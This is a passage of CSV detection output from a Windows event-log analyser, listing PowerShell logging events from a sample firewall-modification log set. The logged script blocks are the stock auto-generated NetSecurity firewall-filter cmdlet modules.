$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH 
firewall rule activation.evtx 2021-04-23 19:09:45.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.003 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.004 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 